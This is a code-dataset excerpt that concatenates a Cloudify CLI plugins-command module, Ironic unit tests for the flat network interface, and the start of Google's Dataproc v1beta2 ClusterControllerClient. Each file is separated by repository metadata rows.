blueprint. Otherwise, list plugins updates for all blueprints.
"""
utils.explicit_tenant_name_message(tenant_name, logger)
if blueprint_id:
logger.info('Listing plugins updates for blueprint {0}...'.format(
blueprint_id))
else:
logger.info('Listing all plugins updates...')
plugins_updates = client.plugins_update.list(
sort=sort_by,
is_descending=descending,
_all_tenants=all_tenants,
_search=search,
_offset=pagination_offset,
_size=pagination_size,
blueprint_id=blueprint_id
)
total = plugins_updates.metadata.pagination.total
print_data(
PLUGINS_UPDATE_COLUMNS, plugins_updates, 'Plugins updates:')
logger.info('Showing {0} of {1} plugins updates'.format(
len(plugins_updates), total))
| 37.053613
| 79
| 0.669602
|
m cloudify_cli.logger import get_events_logger
from cloudify_cli.exceptions import SuppressedCloudifyCliError
from cloudify_rest_client.constants import VISIBILITY_EXCEPT_PRIVATE
from .. import utils
from ..table import print_data, print_single
from ..cli import helptexts, cfy
from ..utils import (prettify_client_error,
get_visibility,
validate_visibility)
PLUGIN_COLUMNS = ['id', 'package_name', 'package_version', 'distribution',
'supported_platform', 'distribution_release', 'uploaded_at',
'visibility', 'tenant_name', 'created_by', 'yaml_url_path']
PLUGINS_UPDATE_COLUMNS = ['id', 'state', 'blueprint_id', 'temp_blueprint_id',
'execution_id', 'deployments_to_update',
'visibility', 'created_at', 'forced']
GET_DATA_COLUMNS = ['file_server_path']
EXCLUDED_COLUMNS = ['archive_name', 'distribution_version', 'excluded_wheels',
'package_source', 'supported_py_versions', 'wheels']
@cfy.group(name='plugins')
@cfy.options.common_options
def plugins():
pass
@plugins.command(name='validate',
short_help='Validate a plugin')
@cfy.argument('plugin-path')
@cfy.options.common_options
@cfy.pass_logger
def validate(plugin_path, logger):
logger.info('Validating plugin {0}...'.format(plugin_path))
wagon.validate(plugin_path)
logger.info('Plugin validated successfully')
@plugins.command(name='delete',
short_help='Delete a plugin [manager only]')
@cfy.argument('plugin-id')
@cfy.options.force(help=helptexts.FORCE_DELETE_PLUGIN)
@cfy.options.common_options
@cfy.options.tenant_name(required=False, resource_name_for_help='plugin')
@cfy.assert_manager_active()
@cfy.pass_client()
@cfy.pass_logger
def delete(plugin_id, force, logger, client, tenant_name):
utils.explicit_tenant_name_message(tenant_name, logger)
logger.info('Deleting plugin {0}...'.format(plugin_id))
client.plugins.delete(plugin_id=plugin_id, force=force)
logger.info('Plugin deleted')
@plugins.command(name='upload',
short_help='Upload a plugin [manager only]')
@cfy.argument('plugin-path')
@cfy.options.plugin_yaml_path()
@cfy.options.private_resource
@cfy.options.visibility()
@cfy.options.common_options
@cfy.options.tenant_name(required=False, resource_name_for_help='plugin')
@cfy.pass_context
@cfy.assert_manager_active()
@cfy.pass_client()
@cfy.pass_logger
def upload(ctx,
plugin_path,
yaml_path,
private_resource,
visibility,
logger,
client,
tenant_name):
utils.explicit_tenant_name_message(tenant_name, logger)
logger.info('Creating plugin zip archive..')
wagon_path = utils.get_local_path(plugin_path, create_temp=True)
yaml_path = utils.get_local_path(yaml_path, create_temp=True)
zip_path = utils.zip_files([wagon_path, yaml_path])
progress_handler = utils.generate_progress_handler(zip_path, '')
visibility = get_visibility(private_resource, visibility, logger)
logger.info('Uploading plugin archive (wagon + yaml)..')
try:
plugin = client.plugins.upload(zip_path,
visibility,
progress_handler)
logger.info("Plugin uploaded. Plugin's id is {0}".format(plugin.id))
finally:
os.remove(wagon_path)
os.remove(yaml_path)
os.remove(zip_path)
@plugins.command(name='bundle-upload',
short_help='Upload a bundle of plugins [manager only]')
@cfy.options.plugins_bundle_path
@cfy.pass_client()
@cfy.pass_logger
def upload_caravan(client, logger, path):
if not path:
logger.info("Starting upload of plugins bundle, "
"this may take few minutes to complete.")
path = 'http://repository.cloudifysource.org/' \
'cloudify/wagons/cloudify-plugins-bundle.tgz'
progress = utils.generate_progress_handler(path, '')
plugins_ = client.plugins.upload(path, progress_callback=progress)
logger.info("Bundle uploaded, {0} Plugins installed."
.format(len(plugins_)))
if len(plugins_) > 0:
logger.info("The plugins' ids are:\n{0}\n".
format('\n'.join([p.id for p in plugins_])))
@plugins.command(name='download',
short_help='Download a plugin [manager only]')
@cfy.argument('plugin-id')
@cfy.options.output_path
@cfy.options.common_options
@cfy.options.tenant_name(required=False, resource_name_for_help='plugin')
@cfy.pass_logger
@cfy.pass_client()
def download(plugin_id, output_path, logger, client, tenant_name):
utils.explicit_tenant_name_message(tenant_name, logger)
logger.info('Downloading plugin {0}...'.format(plugin_id))
plugin_name = output_path if output_path else plugin_id
progress_handler = utils.generate_progress_handler(plugin_name, '')
target_file = client.plugins.download(plugin_id,
output_path,
progress_handler)
logger.info('Plugin downloaded as {0}'.format(target_file))
@plugins.command(name='get',
short_help='Retrieve plugin information [manager only]')
@cfy.argument('plugin-id')
@cfy.options.common_options
@cfy.options.get_data
@cfy.options.tenant_name(required=False, resource_name_for_help='plugin')
@cfy.assert_manager_active()
@cfy.pass_client()
@cfy.pass_logger
def get(plugin_id, logger, client, tenant_name, get_data):
utils.explicit_tenant_name_message(tenant_name, logger)
logger.info('Retrieving plugin {0}...'.format(plugin_id))
plugin = client.plugins.get(plugin_id, _get_data=get_data)
_transform_plugin_response(plugin)
columns = PLUGIN_COLUMNS + GET_DATA_COLUMNS if get_data else PLUGIN_COLUMNS
print_single(columns, plugin, 'Plugin:')
@plugins.command(name='list',
short_help='List plugins [manager only]')
@cfy.options.sort_by('uploaded_at')
@cfy.options.descending
@cfy.options.tenant_name_for_list(
required=False, resource_name_for_help='plugin')
@cfy.options.all_tenants
@cfy.options.search
@cfy.options.common_options
@cfy.options.get_data
@cfy.options.pagination_offset
@cfy.options.pagination_size
@cfy.assert_manager_active()
@cfy.pass_client()
@cfy.pass_logger
def list(sort_by,
descending,
tenant_name,
all_tenants,
search,
pagination_offset,
pagination_size,
logger,
client,
get_data):
utils.explicit_tenant_name_message(tenant_name, logger)
logger.info('Listing all plugins...')
plugins_list = client.plugins.list(sort=sort_by,
is_descending=descending,
_all_tenants=all_tenants,
_search=search,
_get_data=get_data,
_offset=pagination_offset,
_size=pagination_size)
for plugin in plugins_list:
_transform_plugin_response(plugin)
columns = PLUGIN_COLUMNS + GET_DATA_COLUMNS if get_data else PLUGIN_COLUMNS
print_data(columns, plugins_list, 'Plugins:')
total = plugins_list.metadata.pagination.total
logger.info('Showing {0} of {1} plugins'.format(len(plugins_list),
total))
def _transform_plugin_response(plugin):
for column in EXCLUDED_COLUMNS:
plugin.pop(column, None)
@plugins.command(name='set-global',
short_help="Set the plugin's visibility to global")
@cfy.argument('plugin-id')
@cfy.options.common_options
@cfy.assert_manager_active()
@cfy.pass_client(use_tenant_in_header=True)
@cfy.pass_logger
def set_global(plugin_id, logger, client):
status_codes = [400, 403, 404]
with prettify_client_error(status_codes, logger):
client.plugins.set_global(plugin_id)
logger.info('Plugin `{0}` was set to global'.format(plugin_id))
logger.info("This command will be deprecated soon, please use the "
"'set-visibility' command instead")
@plugins.command(name='set-visibility',
short_help="Set the plugin's visibility")
@cfy.argument('plugin-id')
@cfy.options.visibility(required=True, valid_values=VISIBILITY_EXCEPT_PRIVATE)
@cfy.options.common_options
@cfy.assert_manager_active()
@cfy.pass_client(use_tenant_in_header=True)
@cfy.pass_logger
def set_visibility(plugin_id, visibility, logger, client):
validate_visibility(visibility, valid_values=VISIBILITY_EXCEPT_PRIVATE)
status_codes = [400, 403, 404]
with prettify_client_error(status_codes, logger):
client.plugins.set_visibility(plugin_id, visibility)
logger.info('Plugin `{0}` was set to {1}'.format(plugin_id,
visibility))
@plugins.command(name='update',
short_help='Update the plugins of all the deployments of '
'the blueprint [manager only]')
@cfy.argument('blueprint-id')
@cfy.options.common_options
@cfy.options.tenant_name(required=False, resource_name_for_help='plugin')
@cfy.assert_manager_active()
@cfy.options.include_logs
@cfy.options.json_output
@cfy.pass_logger
@cfy.pass_client()
@cfy.options.force(help=helptexts.FORCE_PLUGINS_UPDATE)
def update(blueprint_id,
include_logs,
json_output,
logger,
client,
tenant_name,
force):
utils.explicit_tenant_name_message(tenant_name, logger)
logger.info('Updating the plugins of the deployments of the blueprint '
'{}'.format(blueprint_id))
plugins_update = client.plugins_update.update_plugins(blueprint_id, force)
events_logger = get_events_logger(json_output)
execution = execution_events_fetcher.wait_for_execution(
client,
client.executions.get(plugins_update.execution_id),
events_handler=events_logger,
include_logs=include_logs,
timeout=None
)
if execution.error:
logger.info("Execution of workflow '{0}' for blueprint "
"'{1}' failed. [error={2}]"
.format(execution.workflow_id,
blueprint_id,
execution.error))
logger.info('Failed updating plugins for blueprint {0}. '
'Plugins update ID: {1}. Execution id: {2}'
.format(blueprint_id,
plugins_update.id,
execution.id))
raise SuppressedCloudifyCliError()
logger.info("Finished executing workflow '{0}'".format(
execution.workflow_id))
logger.info('Successfully updated plugins for blueprint {0}. '
'Plugins update ID: {1}. Execution id: {2}'
.format(blueprint_id,
plugins_update.id,
execution.id))
@plugins.command(
name='get-update',
short_help='Retrieve plugins update information [manager only]'
)
@cfy.argument('plugins-update-id')
@cfy.options.common_options
@cfy.options.tenant_name(required=False,
resource_name_for_help='plugins update')
@cfy.assert_manager_active()
@cfy.pass_client()
@cfy.pass_logger
def manager_get_update(plugins_update_id, logger, client, tenant_name):
utils.explicit_tenant_name_message(tenant_name, logger)
logger.info('Retrieving plugins update {0}...'.format(plugins_update_id))
plugins_update_dict = client.plugins_update.get(plugins_update_id)
print_single(
PLUGINS_UPDATE_COLUMNS, plugins_update_dict, 'Plugins update:')
@plugins.command(name='history', short_help='List plugins updates '
'[manager only]')
@cfy.options.blueprint_id()
@cfy.options.sort_by()
@cfy.options.descending
@cfy.options.tenant_name_for_list(
required=False, resource_name_for_help='plugins update')
@cfy.options.all_tenants
@cfy.options.search
@cfy.options.pagination_offset
@cfy.options.pagination_size
@cfy.options.common_options
@cfy.assert_manager_active()
@cfy.pass_client()
@cfy.pass_logger
def manager_history(blueprint_id,
sort_by,
descending,
all_tenants,
search,
pagination_offset,
pagination_size,
logger,
client,
tenant_name):
utils.explicit_tenant_name_message(tenant_name, logger)
if blueprint_id:
logger.info('Listing plugins updates for blueprint {0}...'.format(
blueprint_id))
else:
logger.info('Listing all plugins updates...')
plugins_updates = client.plugins_update.list(
sort=sort_by,
is_descending=descending,
_all_tenants=all_tenants,
_search=search,
_offset=pagination_offset,
_size=pagination_size,
blueprint_id=blueprint_id
)
total = plugins_updates.metadata.pagination.total
print_data(
PLUGINS_UPDATE_COLUMNS, plugins_updates, 'Plugins updates:')
logger.info('Showing {0} of {1} plugins updates'.format(
len(plugins_updates), total))
| true
| true
|
1c4228dbb2d4de48a3adda7dd0f253c0aee5db36
| 8,872
|
py
|
Python
|
ironic-plugin-pike/ironic/tests/unit/drivers/modules/network/test_flat.py
|
saintifly/Server_Manage_Plugin
|
ae272e7e3ca065236cc7bc86c296ff9eb83f1bb9
|
[
"Apache-2.0"
] | null | null | null |
ironic-plugin-pike/ironic/tests/unit/drivers/modules/network/test_flat.py
|
saintifly/Server_Manage_Plugin
|
ae272e7e3ca065236cc7bc86c296ff9eb83f1bb9
|
[
"Apache-2.0"
] | null | null | null |
ironic-plugin-pike/ironic/tests/unit/drivers/modules/network/test_flat.py
|
saintifly/Server_Manage_Plugin
|
ae272e7e3ca065236cc7bc86c296ff9eb83f1bb9
|
[
"Apache-2.0"
] | 1
|
2019-01-11T16:00:23.000Z
|
2019-01-11T16:00:23.000Z
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from neutronclient.common import exceptions as neutron_exceptions
from oslo_config import cfg
from oslo_utils import uuidutils
from ironic.common import exception
from ironic.common import neutron
from ironic.conductor import task_manager
from ironic.drivers.modules.network import flat as flat_interface
from ironic.tests.unit.conductor import mgr_utils
from ironic.tests.unit.db import base as db_base
from ironic.tests.unit.objects import utils
CONF = cfg.CONF
VIFMIXINPATH = 'ironic.drivers.modules.network.common.NeutronVIFPortIDMixin'
class TestFlatInterface(db_base.DbTestCase):
def setUp(self):
super(TestFlatInterface, self).setUp()
self.config(enabled_drivers=['fake'])
mgr_utils.mock_the_extension_manager()
self.interface = flat_interface.FlatNetwork()
self.node = utils.create_test_node(self.context)
self.port = utils.create_test_port(
self.context, node_id=self.node.id,
internal_info={
'cleaning_vif_port_id': uuidutils.generate_uuid()})
@mock.patch('%s.vif_list' % VIFMIXINPATH)
def test_vif_list(self, mock_vif_list):
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.vif_list(task)
mock_vif_list.assert_called_once_with(task)
@mock.patch('%s.vif_attach' % VIFMIXINPATH)
def test_vif_attach(self, mock_vif_attach):
vif = mock.MagicMock()
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.vif_attach(task, vif)
mock_vif_attach.assert_called_once_with(task, vif)
@mock.patch('%s.vif_detach' % VIFMIXINPATH)
def test_vif_detach(self, mock_vif_detach):
vif_id = "vif"
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.vif_detach(task, vif_id)
mock_vif_detach.assert_called_once_with(task, vif_id)
@mock.patch('%s.port_changed' % VIFMIXINPATH)
def test_vif_port_changed(self, mock_p_changed):
port = mock.MagicMock()
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.port_changed(task, port)
mock_p_changed.assert_called_once_with(task, port)
@mock.patch.object(flat_interface, 'LOG')
def test_init_no_cleaning_network(self, mock_log):
self.config(cleaning_network=None, group='neutron')
flat_interface.FlatNetwork()
self.assertTrue(mock_log.warning.called)
@mock.patch.object(neutron, 'validate_network', autospec=True)
def test_validate(self, validate_mock):
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.validate(task)
validate_mock.assert_called_once_with(CONF.neutron.cleaning_network,
'cleaning network')
@mock.patch.object(neutron, 'validate_network',
side_effect=lambda n, t: n)
@mock.patch.object(neutron, 'add_ports_to_network')
@mock.patch.object(neutron, 'rollback_ports')
def test_add_cleaning_network(self, rollback_mock, add_mock,
validate_mock):
add_mock.return_value = {self.port.uuid: 'vif-port-id'}
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.add_cleaning_network(task)
rollback_mock.assert_called_once_with(
task, CONF.neutron.cleaning_network)
add_mock.assert_called_once_with(
task, CONF.neutron.cleaning_network)
validate_mock.assert_called_once_with(
CONF.neutron.cleaning_network,
'cleaning network')
self.port.refresh()
self.assertEqual('vif-port-id',
self.port.internal_info['cleaning_vif_port_id'])
@mock.patch.object(neutron, 'validate_network',
side_effect=lambda n, t: n)
@mock.patch.object(neutron, 'remove_ports_from_network')
def test_remove_cleaning_network(self, remove_mock, validate_mock):
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.remove_cleaning_network(task)
remove_mock.assert_called_once_with(
task, CONF.neutron.cleaning_network)
validate_mock.assert_called_once_with(
CONF.neutron.cleaning_network,
'cleaning network')
self.port.refresh()
self.assertNotIn('cleaning_vif_port_id', self.port.internal_info)
@mock.patch.object(neutron, 'get_client')
def test_add_provisioning_network_set_binding_host_id(
self, client_mock):
upd_mock = mock.Mock()
client_mock.return_value.update_port = upd_mock
instance_info = self.node.instance_info
instance_info['nova_host_id'] = 'nova_host_id'
self.node.instance_info = instance_info
self.node.save()
extra = {'vif_port_id': 'foo'}
utils.create_test_port(self.context, node_id=self.node.id,
address='52:54:00:cf:2d:33', extra=extra,
uuid=uuidutils.generate_uuid())
exp_body = {'port': {'binding:host_id': 'nova_host_id'}}
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.add_provisioning_network(task)
upd_mock.assert_called_once_with('foo', exp_body)
@mock.patch.object(neutron, 'get_client')
def test_add_provisioning_network_set_binding_host_id_portgroup(
self, client_mock):
upd_mock = mock.Mock()
client_mock.return_value.update_port = upd_mock
instance_info = self.node.instance_info
instance_info['nova_host_id'] = 'nova_host_id'
self.node.instance_info = instance_info
self.node.save()
internal_info = {'tenant_vif_port_id': 'foo'}
utils.create_test_portgroup(
self.context, node_id=self.node.id, internal_info=internal_info,
uuid=uuidutils.generate_uuid())
utils.create_test_port(
self.context, node_id=self.node.id, address='52:54:00:cf:2d:33',
extra={'vif_port_id': 'bar'}, uuid=uuidutils.generate_uuid())
exp_body = {'port': {'binding:host_id': 'nova_host_id'}}
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.add_provisioning_network(task)
upd_mock.assert_has_calls([
mock.call('bar', exp_body), mock.call('foo', exp_body)
])
@mock.patch.object(neutron, 'get_client')
def test_add_provisioning_network_no_binding_host_id(
self, client_mock):
upd_mock = mock.Mock()
client_mock.return_value.update_port = upd_mock
instance_info = self.node.instance_info
instance_info.pop('nova_host_id', None)
self.node.instance_info = instance_info
self.node.save()
extra = {'vif_port_id': 'foo'}
utils.create_test_port(self.context, node_id=self.node.id,
address='52:54:00:cf:2d:33', extra=extra,
uuid=uuidutils.generate_uuid())
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.add_provisioning_network(task)
self.assertFalse(upd_mock.called)
@mock.patch.object(neutron, 'get_client')
def test_add_provisioning_network_binding_host_id_raise(
self, client_mock):
client_mock.return_value.update_port.side_effect = \
(neutron_exceptions.ConnectionFailed())
instance_info = self.node.instance_info
instance_info['nova_host_id'] = 'nova_host_id'
self.node.instance_info = instance_info
self.node.save()
extra = {'vif_port_id': 'foo'}
utils.create_test_port(self.context, node_id=self.node.id,
address='52:54:00:cf:2d:33', extra=extra,
uuid=uuidutils.generate_uuid())
with task_manager.acquire(self.context, self.node.id) as task:
self.assertRaises(exception.NetworkError,
self.interface.add_provisioning_network,
task)
| 46.208333
| 78
| 0.664675
|
import mock
from neutronclient.common import exceptions as neutron_exceptions
from oslo_config import cfg
from oslo_utils import uuidutils
from ironic.common import exception
from ironic.common import neutron
from ironic.conductor import task_manager
from ironic.drivers.modules.network import flat as flat_interface
from ironic.tests.unit.conductor import mgr_utils
from ironic.tests.unit.db import base as db_base
from ironic.tests.unit.objects import utils
CONF = cfg.CONF
VIFMIXINPATH = 'ironic.drivers.modules.network.common.NeutronVIFPortIDMixin'
class TestFlatInterface(db_base.DbTestCase):
def setUp(self):
super(TestFlatInterface, self).setUp()
self.config(enabled_drivers=['fake'])
mgr_utils.mock_the_extension_manager()
self.interface = flat_interface.FlatNetwork()
self.node = utils.create_test_node(self.context)
self.port = utils.create_test_port(
self.context, node_id=self.node.id,
internal_info={
'cleaning_vif_port_id': uuidutils.generate_uuid()})
@mock.patch('%s.vif_list' % VIFMIXINPATH)
def test_vif_list(self, mock_vif_list):
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.vif_list(task)
mock_vif_list.assert_called_once_with(task)
@mock.patch('%s.vif_attach' % VIFMIXINPATH)
def test_vif_attach(self, mock_vif_attach):
vif = mock.MagicMock()
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.vif_attach(task, vif)
mock_vif_attach.assert_called_once_with(task, vif)
@mock.patch('%s.vif_detach' % VIFMIXINPATH)
def test_vif_detach(self, mock_vif_detach):
vif_id = "vif"
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.vif_detach(task, vif_id)
mock_vif_detach.assert_called_once_with(task, vif_id)
@mock.patch('%s.port_changed' % VIFMIXINPATH)
def test_vif_port_changed(self, mock_p_changed):
port = mock.MagicMock()
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.port_changed(task, port)
mock_p_changed.assert_called_once_with(task, port)
@mock.patch.object(flat_interface, 'LOG')
def test_init_no_cleaning_network(self, mock_log):
self.config(cleaning_network=None, group='neutron')
flat_interface.FlatNetwork()
self.assertTrue(mock_log.warning.called)
@mock.patch.object(neutron, 'validate_network', autospec=True)
def test_validate(self, validate_mock):
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.validate(task)
validate_mock.assert_called_once_with(CONF.neutron.cleaning_network,
'cleaning network')
@mock.patch.object(neutron, 'validate_network',
side_effect=lambda n, t: n)
@mock.patch.object(neutron, 'add_ports_to_network')
@mock.patch.object(neutron, 'rollback_ports')
def test_add_cleaning_network(self, rollback_mock, add_mock,
validate_mock):
add_mock.return_value = {self.port.uuid: 'vif-port-id'}
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.add_cleaning_network(task)
rollback_mock.assert_called_once_with(
task, CONF.neutron.cleaning_network)
add_mock.assert_called_once_with(
task, CONF.neutron.cleaning_network)
validate_mock.assert_called_once_with(
CONF.neutron.cleaning_network,
'cleaning network')
self.port.refresh()
self.assertEqual('vif-port-id',
self.port.internal_info['cleaning_vif_port_id'])
@mock.patch.object(neutron, 'validate_network',
side_effect=lambda n, t: n)
@mock.patch.object(neutron, 'remove_ports_from_network')
def test_remove_cleaning_network(self, remove_mock, validate_mock):
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.remove_cleaning_network(task)
remove_mock.assert_called_once_with(
task, CONF.neutron.cleaning_network)
validate_mock.assert_called_once_with(
CONF.neutron.cleaning_network,
'cleaning network')
self.port.refresh()
self.assertNotIn('cleaning_vif_port_id', self.port.internal_info)
@mock.patch.object(neutron, 'get_client')
def test_add_provisioning_network_set_binding_host_id(
self, client_mock):
upd_mock = mock.Mock()
client_mock.return_value.update_port = upd_mock
instance_info = self.node.instance_info
instance_info['nova_host_id'] = 'nova_host_id'
self.node.instance_info = instance_info
self.node.save()
extra = {'vif_port_id': 'foo'}
utils.create_test_port(self.context, node_id=self.node.id,
address='52:54:00:cf:2d:33', extra=extra,
uuid=uuidutils.generate_uuid())
exp_body = {'port': {'binding:host_id': 'nova_host_id'}}
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.add_provisioning_network(task)
upd_mock.assert_called_once_with('foo', exp_body)
@mock.patch.object(neutron, 'get_client')
def test_add_provisioning_network_set_binding_host_id_portgroup(
self, client_mock):
upd_mock = mock.Mock()
client_mock.return_value.update_port = upd_mock
instance_info = self.node.instance_info
instance_info['nova_host_id'] = 'nova_host_id'
self.node.instance_info = instance_info
self.node.save()
internal_info = {'tenant_vif_port_id': 'foo'}
utils.create_test_portgroup(
self.context, node_id=self.node.id, internal_info=internal_info,
uuid=uuidutils.generate_uuid())
utils.create_test_port(
self.context, node_id=self.node.id, address='52:54:00:cf:2d:33',
extra={'vif_port_id': 'bar'}, uuid=uuidutils.generate_uuid())
exp_body = {'port': {'binding:host_id': 'nova_host_id'}}
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.add_provisioning_network(task)
upd_mock.assert_has_calls([
mock.call('bar', exp_body), mock.call('foo', exp_body)
])
@mock.patch.object(neutron, 'get_client')
def test_add_provisioning_network_no_binding_host_id(
self, client_mock):
upd_mock = mock.Mock()
client_mock.return_value.update_port = upd_mock
instance_info = self.node.instance_info
instance_info.pop('nova_host_id', None)
self.node.instance_info = instance_info
self.node.save()
extra = {'vif_port_id': 'foo'}
utils.create_test_port(self.context, node_id=self.node.id,
address='52:54:00:cf:2d:33', extra=extra,
uuid=uuidutils.generate_uuid())
with task_manager.acquire(self.context, self.node.id) as task:
self.interface.add_provisioning_network(task)
self.assertFalse(upd_mock.called)
@mock.patch.object(neutron, 'get_client')
def test_add_provisioning_network_binding_host_id_raise(
self, client_mock):
client_mock.return_value.update_port.side_effect = \
(neutron_exceptions.ConnectionFailed())
instance_info = self.node.instance_info
instance_info['nova_host_id'] = 'nova_host_id'
self.node.instance_info = instance_info
self.node.save()
extra = {'vif_port_id': 'foo'}
utils.create_test_port(self.context, node_id=self.node.id,
address='52:54:00:cf:2d:33', extra=extra,
uuid=uuidutils.generate_uuid())
with task_manager.acquire(self.context, self.node.id) as task:
self.assertRaises(exception.NetworkError,
self.interface.add_provisioning_network,
task)
| true
| true
|
1c422994b9f5e1e95b9791a3d2ed123c94ba30ac
| 37,827
|
py
|
Python
|
dataproc/google/cloud/dataproc_v1beta2/gapic/cluster_controller_client.py
|
ryanyuan/google-cloud-python
|
db481bfdd6816d020d99df0d4caa307358ab1141
|
[
"Apache-2.0"
] | 2
|
2021-11-26T07:08:43.000Z
|
2022-03-07T20:20:04.000Z
|
dataproc/google/cloud/dataproc_v1beta2/gapic/cluster_controller_client.py
|
ryanyuan/google-cloud-python
|
db481bfdd6816d020d99df0d4caa307358ab1141
|
[
"Apache-2.0"
] | null | null | null |
dataproc/google/cloud/dataproc_v1beta2/gapic/cluster_controller_client.py
|
ryanyuan/google-cloud-python
|
db481bfdd6816d020d99df0d4caa307358ab1141
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Accesses the google.cloud.dataproc.v1beta2 ClusterController API."""
import functools
import pkg_resources
import warnings
from google.oauth2 import service_account
import google.api_core.client_options
import google.api_core.gapic_v1.client_info
import google.api_core.gapic_v1.config
import google.api_core.gapic_v1.method
import google.api_core.grpc_helpers
import google.api_core.operation
import google.api_core.operations_v1
import google.api_core.page_iterator
import grpc
from google.cloud.dataproc_v1beta2.gapic import cluster_controller_client_config
from google.cloud.dataproc_v1beta2.gapic import enums
from google.cloud.dataproc_v1beta2.gapic.transports import (
cluster_controller_grpc_transport,
)
from google.cloud.dataproc_v1beta2.proto import autoscaling_policies_pb2
from google.cloud.dataproc_v1beta2.proto import autoscaling_policies_pb2_grpc
from google.cloud.dataproc_v1beta2.proto import clusters_pb2
from google.cloud.dataproc_v1beta2.proto import clusters_pb2_grpc
from google.cloud.dataproc_v1beta2.proto import operations_pb2 as proto_operations_pb2
from google.longrunning import operations_pb2 as longrunning_operations_pb2
from google.protobuf import duration_pb2
from google.protobuf import empty_pb2
from google.protobuf import field_mask_pb2
_GAPIC_LIBRARY_VERSION = pkg_resources.get_distribution("google-cloud-dataproc").version
class ClusterControllerClient(object):
"""
The ClusterControllerService provides methods to manage clusters
of Compute Engine instances.
"""
SERVICE_ADDRESS = "dataproc.googleapis.com:443"
"""The default address of the service."""
# The name of the interface for this client. This is the key used to
# find the method configuration in the client_config dictionary.
_INTERFACE_NAME = "google.cloud.dataproc.v1beta2.ClusterController"
@classmethod
def from_service_account_file(cls, filename, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
ClusterControllerClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
def __init__(
self,
transport=None,
channel=None,
credentials=None,
client_config=None,
client_info=None,
client_options=None,
):
"""Constructor.
Args:
transport (Union[~.ClusterControllerGrpcTransport,
Callable[[~.Credentials, type], ~.ClusterControllerGrpcTransport]): A transport
instance, responsible for actually making the API calls.
The default transport uses the gRPC protocol.
This argument may also be a callable which returns a
transport instance. Callables will be sent the credentials
as the first argument and the default transport class as
the second argument.
channel (grpc.Channel): DEPRECATED. A ``Channel`` instance
through which to make calls. This argument is mutually exclusive
with ``credentials``; providing both will raise an exception.
credentials (google.auth.credentials.Credentials): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is mutually exclusive with providing a
transport instance to ``transport``; doing so will raise
an exception.
client_config (dict): DEPRECATED. A dictionary of call options for
each method. If not specified, the default configuration is used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
client_options (Union[dict, google.api_core.client_options.ClientOptions]):
Client options used to set user options on the client. API Endpoint
should be set through client_options.
"""
# Raise deprecation warnings for things we want to go away.
if client_config is not None:
warnings.warn(
"The `client_config` argument is deprecated.",
PendingDeprecationWarning,
stacklevel=2,
)
else:
client_config = cluster_controller_client_config.config
if channel:
warnings.warn(
"The `channel` argument is deprecated; use " "`transport` instead.",
PendingDeprecationWarning,
stacklevel=2,
)
api_endpoint = self.SERVICE_ADDRESS
if client_options:
if type(client_options) == dict:
client_options = google.api_core.client_options.from_dict(
client_options
)
if client_options.api_endpoint:
api_endpoint = client_options.api_endpoint
# Instantiate the transport.
# The transport is responsible for handling serialization and
# deserialization and actually sending data to the service.
if transport:
if callable(transport):
self.transport = transport(
credentials=credentials,
default_class=cluster_controller_grpc_transport.ClusterControllerGrpcTransport,
address=api_endpoint,
)
else:
if credentials:
raise ValueError(
"Received both a transport instance and "
"credentials; these are mutually exclusive."
)
self.transport = transport
else:
self.transport = cluster_controller_grpc_transport.ClusterControllerGrpcTransport(
address=api_endpoint, channel=channel, credentials=credentials
)
if client_info is None:
client_info = google.api_core.gapic_v1.client_info.ClientInfo(
gapic_version=_GAPIC_LIBRARY_VERSION
)
else:
client_info.gapic_version = _GAPIC_LIBRARY_VERSION
self._client_info = client_info
# Parse out the default settings for retry and timeout for each RPC
# from the client configuration.
# (Ordinarily, these are the defaults specified in the `*_config.py`
# file next to this one.)
self._method_configs = google.api_core.gapic_v1.config.parse_method_configs(
client_config["interfaces"][self._INTERFACE_NAME]
)
# Save a dictionary of cached API call functions.
# These are the actual callables which invoke the proper
# transport methods, wrapped with `wrap_method` to add retry,
# timeout, and the like.
self._inner_api_calls = {}
# Service calls
def create_cluster(
self,
project_id,
region,
cluster,
request_id=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
